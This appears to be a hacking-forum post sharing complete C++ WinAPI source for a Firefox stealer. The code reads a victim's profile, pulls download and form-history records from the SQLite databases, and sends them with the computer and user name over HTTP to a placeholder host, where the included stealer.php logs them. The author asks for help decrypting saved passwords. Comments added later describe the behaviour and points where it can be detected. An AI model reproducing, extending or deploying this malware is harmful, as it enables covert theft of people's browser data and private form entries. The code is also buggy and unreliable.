Cartman.

[C++ ]Mozilla Stealer Project using WinApi


Here is my Mozilla Firefox stealer; it steals download lists and form history. It can easily be extended and used to steal

other data from Mozilla Firefox. I used SQLite, through a sqlite.lib file which I compiled. I used web-based communication.

I generally used WinAPI functions.

The data is sent to a PHP file and logged on a server. Please don't forget to give permissions

Thanks JeFF for his help about widestring and ansi-string help.

Thanks frankl3fr6nk for kind beta testing

Thanks icarus for his helps to me about learning malware fundamentals :)

We can develop this stealer together with peoples who have knowledge about these. For instance

- my first question is how to decrypt to encrypted password

- How to do this code more compatible with other operating systems

- How to reduce the size

I attached sqlite3.h and sqlite3.c and sqlite.lib

config.h


// Compile-time settings for the outbound HTTP channel.
// HOST and PAGE_NAME are passed to Request() by getFormHistory()/getDownloads()
// as the server name and the start of the request path; PORT is handed to
// InternetConnectA() inside Request().
// The host value shown looks like a placeholder. Port 80 together with the
// plain INTERNET_SERVICE_HTTP connection in Request() means the traffic is
// unencrypted HTTP and readable by proxies and network sensors.
#define HOST "www.xxx.com" // Do not change its format..
#define PORT 80
#define PAGE_NAME "stealer.php" // Do not change its format..

functions.h

#include <Windows.h>
#include <WinInet.h>
#include "config.h"

// Sends one HTTP GET to `server` on PORT with `input` as the request
// path/query; returns nothing (defined in functions.cpp).
void Request (const char* server,const char* input);
// Returns a heap-allocated string made of the computer name immediately
// followed by the user name; the caller owns the buffer (defined in functions.cpp).
char* getComputerName();

getFormHistory.h

#include "config.h"
#include "sqlite3.h"

// Reads formhistory.sqlite under the profile directory `path` and sends the
// collected rows to HOST (defined in getFormHistory.cpp).
void getFormHistory(char* path);

getDownloads.h

#include "config.h"
#include "sqlite3.h"
// Reads downloads.sqlite under the profile directory `path` and sends the
// collected rows to HOST (defined in getDownloads.cpp).
void getDownloads(char *path);

functions.cpp

#include "functions.h"

// Issues a single HTTP GET to `server` on PORT (config.h) through WinINet,
// using `input` verbatim as the request object (path plus query string).
// Nothing is returned to the caller and the server's response is never read.
// Network-visible traits of the request: the agent string given to
// InternetOpenA is "Open", the method is GET, and a form-urlencoded
// Content-Type header is attached although no request body is sent.
void Request (const char* server,const char* input)
{
HINTERNET hInternet;
HINTERNET hConnect;
HINTERNET hRequest;

// PRECONFIG: use the proxy/direct settings already configured on the host.
hInternet = InternetOpenA("Open",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,INTERNET_FLAG_DONT_CACHE);
if (hInternet != NULL)
{
// Plain HTTP service with no user name or password.
hConnect = InternetConnectA(hInternet,server,PORT,NULL,NULL,INTERNET_SERVICE_HTTP,0,1u);
if (hConnect != NULL)
{
// No INTERNET_FLAG_SECURE is set, so the request is not sent over TLS.
hRequest = HttpOpenRequestA(hConnect,"GET",input,NULL,NULL,0,INTERNET_FLAG_KEEP_CONNECTION,1);
if (hRequest != NULL)
{
// Header length -1L lets WinINet measure the header string; the result of
// the send is not checked.
HttpSendRequestA(hRequest,"Content-Type: application/x-www-form-urlencoded\r\n",-1L,NULL,0);
}
}
}
// All three handles are closed unconditionally; hConnect and hRequest hold
// no assigned value when an earlier call failed.
InternetCloseHandle(hInternet);
InternetCloseHandle(hConnect);
InternetCloseHandle(hRequest);
}

// Builds the host identifier used in the outbound request: the computer name
// immediately followed by the current user name, with no separator.
// Returns a 1024-byte heap buffer that the caller is expected to free.
// The callers place this string in the `computerName` query parameter, and
// stealer.php uses that parameter as the log file name.
char* getComputerName()
{
DWORD computerNameSize = 512;
char* computerName;
computerName = (char*)malloc(512*sizeof(char));
// Return value is not checked; the buffer is not initialised beforehand.
GetComputerNameA(computerName, &computerNameSize);

DWORD UserNameSize = 512;
char* userName;
userName = (char*)malloc(512*sizeof(char));

// Return value is not checked here either.
GetUserNameA(userName, &UserNameSize);

// Zeroed first so that strcat starts from an empty string.
char* fullComputerName = (char*)malloc(1024*sizeof(char));
ZeroMemory(fullComputerName,1024*sizeof(char));
strcat(fullComputerName,(const char*)computerName);
strcat(fullComputerName,userName);

// The two 512-byte temporaries are not freed before returning.
return fullComputerName;
}

getFormHistory.cpp

#include "getFormHistory.h"
#include "functions.h"

// Reads the Firefox form-history database under `path` and sends its rows to
// HOST in one GET request through Request().
//   path: profile directory string; it is copied and not modified here.
// Observable behaviour: opens <path>\formhistory.sqlite with SQLite, makes up
// to two 429496729-byte (about 410 MB) zeroed heap allocations, then requests
// PAGE_NAME?computerName=<id>-formhistory&formhistory=<rows>.
// The row text is appended to the URL as-is; no URL encoding is applied here.
void getFormHistory(char* path)
{
char *zErrMsg = 0;
int error;
sqlite3_stmt *res;
const char *tail;
char *formhistory;

// Fixed 256-byte working copy of the path; strcpy/strcat are not length-checked.
char* pathCopy;
pathCopy = (char*)malloc(256*sizeof(char));
ZeroMemory(pathCopy,256*sizeof(char));
strcpy(pathCopy,path);

strcat(pathCopy,"\\formhistory.sqlite");
// Writes a NUL at an offset computed from literal string lengths; the purpose
// is not evident from this function. NOTE(review): confirm the intent.
pathCopy[strlen(pathCopy)-(strlen("Default=1")+4)+strlen("\\fomrhistory.sqlite")+1] = '\00';

sqlite3 *db; // sqlite3 db struct
error = sqlite3_open(pathCopy, &db);
if(!error)
{
// About 410 MB for the concatenated rows; the malloc result is not checked.
formhistory = (char*)malloc(429496729);
ZeroMemory(formhistory,429496729);
// The prepare result is not stored, so the check below still tests the
// value returned by sqlite3_open().
sqlite3_prepare_v2(db,"select * from moz_formhistory",1000,&res,&tail);
if (error == SQLITE_OK)
{
while (sqlite3_step(res) == SQLITE_ROW)
{
// Stop adding rows once more than 6000 characters have been collected.
if(strlen(formhistory) > 6000)
break;
// Columns 1 and 2 of each row (presumably field name and value; confirm
// against the moz_formhistory schema) joined by "--". Each row ends with
// "*-*-*", the marker stealer.php replaces with "\t\n".
strcat(formhistory,(char*)sqlite3_column_text(res, 1));
strcat(formhistory,"--");
strcat(formhistory,(char*)sqlite3_column_text(res, 2));
strcat(formhistory,"*-*-*");
}
}
}

// The prepared statement is not finalized before the close.
sqlite3_close(db);

// The 1024-byte buffer allocated here is replaced by the pointer that
// getComputerName() returns.
char* computerName;
computerName = (char*)malloc(1024*sizeof(char));
ZeroMemory(computerName,1024*sizeof(char));
computerName = getComputerName();

// Second ~410 MB buffer, used to assemble the request path and query string.
char *data;
data = (char*)malloc(429496729*sizeof(char));
ZeroMemory(data,429496729*sizeof(char));
strcpy(data,PAGE_NAME);
strcat(data,"?computerName=");
strcat(data,computerName);
strcat(data,"-formhistory");
strcat(data,"&formhistory=");
// formhistory is only assigned when sqlite3_open() succeeded.
strcat(data,formhistory);
Request(HOST,data);
// data and pathCopy are not freed.
free(computerName);
free(formhistory);
}

getDownloads.cpp

#include "getDownloads.h"
#include "functions.h"

// Reads the Firefox download-history database under `path` and sends its rows
// to HOST in one GET request through Request().
//   path: profile directory string; it is copied and not modified here.
// Observable behaviour: opens <path>\downloads.sqlite with SQLite, makes up to
// two 429496729-byte (about 410 MB) zeroed heap allocations, then requests
// PAGE_NAME?computerName=<id>-downloads&downloads=<rows>.
// The row text is appended to the URL as-is; no URL encoding is applied here.
void getDownloads(char *path)
{
char *zErrMsg = 0;
int error;
sqlite3_stmt *res;
const char *tail;
char *downloads;
// Fixed 256-byte working copy of the path; strcpy/strcat are not length-checked.
char* pathCopy;
pathCopy = (char*)malloc(256*sizeof(char));
ZeroMemory(pathCopy,256*sizeof(char));
strcpy(pathCopy,path);
strcat(pathCopy,"\\downloads.sqlite");
// Writes a NUL at an offset computed from literal string lengths; the purpose
// is not evident from this function. NOTE(review): confirm the intent.
pathCopy[strlen(pathCopy)-(strlen("Default=1")+4)+strlen("\\downloads.sqlite")+1] = '\00';

sqlite3 *db; // sqlite3 db struct
error = sqlite3_open(pathCopy, &db);
if(!error)
{
// About 410 MB for the concatenated rows; the malloc result is not checked.
downloads = (char*)malloc(429496729);
ZeroMemory(downloads,429496729);
// The prepare result is not stored, so the check below still tests the
// value returned by sqlite3_open().
sqlite3_prepare_v2(db,"select * from moz_downloads",1000,&res,&tail);
if (error == SQLITE_OK)
{
// Unlike getFormHistory(), this loop has no cap on the collected length.
while (sqlite3_step(res) == SQLITE_ROW)
{
// Column 1 of each row (presumably the download name; confirm against the
// moz_downloads schema), followed by the "*-*-*" marker that stealer.php
// replaces with "\t\n".
strcat(downloads,(char*)sqlite3_column_text(res, 1));
strcat(downloads,"*-*-*");
}
}
}

// The prepared statement is not finalized before the close.
sqlite3_close(db);

// The 1024-byte buffer allocated here is replaced by the pointer that
// getComputerName() returns.
char* computerName;
computerName = (char*)malloc(1024*sizeof(char));
ZeroMemory(computerName,1024*sizeof(char));
computerName = getComputerName();

// Second ~410 MB buffer, used to assemble the request path and query string.
char *data;
data = (char*)malloc(429496729*sizeof(char));
ZeroMemory(data,429496729*sizeof(char));
strcpy(data,PAGE_NAME);
strcat(data,"?computerName=");
strcat(data,computerName);
strcat(data,"-downloads");
strcat(data,"&downloads=");
// downloads is only assigned when sqlite3_open() succeeded.
strcat(data,downloads);
Request(HOST,data);
// data and pathCopy are not freed.
free(computerName);
free(downloads);
}

main.cpp

#include <windows.h>
#include "getFormHistory.h"
#include "getDownloads.h"

// Thanks to LeFF from opensc.ws

// Entry point: takes a Firefox profile path from profiles.ini and passes it to
// getDownloads() and getFormHistory(). Always returns 0.
// File touched here: %APPDATA%\Mozilla\Firefox\profiles.ini (at most the first
// 512 bytes are read). Reads of profiles.ini and of a profile's .sqlite files
// by a process other than Firefox are a practical host-side detection point.
int main()
{
HANDLE hFile;
DWORD dwBytesRead = 0;
char ReadBuffer[513] = {0};
// %APPDATA% is expanded into a 256-byte buffer; the returned length is stored
// in strSize but not used afterwards.
char* appDataStr = (char*)malloc(256*sizeof(char));
int strSize = ExpandEnvironmentStringsA("%APPDATA%",appDataStr, 256 );
char* iniFile;
iniFile = (char*)malloc(512*sizeof(char*));
ZeroMemory(iniFile,512);
strcat((char*)appDataStr,"\\Mozilla\\Firefox\\profiles.ini");
strcat((char*)iniFile,(char*)appDataStr);
hFile = CreateFileA(iniFile,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if (hFile != INVALID_HANDLE_VALUE)
{
ReadFile(hFile, ReadBuffer, 512, &dwBytesRead, NULL);
}
// CloseHandle runs even when CreateFileA failed; parsing then continues on an
// empty buffer.
CloseHandle(hFile);

// Only the first "Path=" entry in the buffer is used; the strstr result is
// not checked before the pointer is advanced past the key.
char *pathStart;
ReadBuffer[dwBytesRead] = '\00';
pathStart = strstr(ReadBuffer,"Path=");
pathStart = pathStart + 5*sizeof(char);
// The path length is derived from the length of the rest of the buffer minus
// the length of "Default=1" plus 4, so it appears to assume a fixed layout
// after the Path line. NOTE(review): confirm against real profiles.ini files.
int size = strlen(pathStart)-(strlen("Default=1")+4);
char *realPath;
realPath = (char*)malloc(256*sizeof(char));
ZeroMemory(realPath,256*sizeof(char));
strncat(realPath,pathStart,size-2); // 4 for \t\n and \t\n


getDownloads(realPath); // Get downloads
getFormHistory(realPath); // Get form history
//each function should keep realPath variable same.

// realPath is not freed.
free(appDataStr);
free(iniFile);
return 0;
}

stealer.php

<html>
<body>

<?php
// Server-side receiver for the client's GET requests: appends the submitted
// data to a file whose name is the computerName parameter.
// The name is used exactly as received, with no validation, and the file is
// opened in append mode before the other parameters are checked.
// A parameter missing from the request reads as null, so the isset() tests
// below are false for it.
$downloads = $_GET["downloads"];
$computerName = $_GET["computerName"];
$formhistory = $_GET["formhistory"];
$handle = fopen($computerName, 'a');
if(isset($downloads))
{
// "*-*-*" is the row marker written by getDownloads(); it becomes "\t\n".
$downloads = str_replace("*-*-*","\t\n", $downloads);
fwrite($handle, $downloads);
fwrite($handle, "\t\n\t\n");
fwrite($handle, "-----downloads done-----\t\n\t\n");
fclose($handle);
}
else if(isset($formhistory))
{
// "*-*-*" is the row marker written by getFormHistory(); it becomes "\t\n".
$formhistory = str_replace("*-*-*","\t\n", $formhistory);
fwrite($handle, $formhistory);
fwrite($handle, "\t\n\t\n");
fwrite($handle, "-----formhistory done-----\t\n\t\n");
fclose($handle);
}
// When neither parameter is set, the handle is never closed explicitly.
?>

</body>
</html>
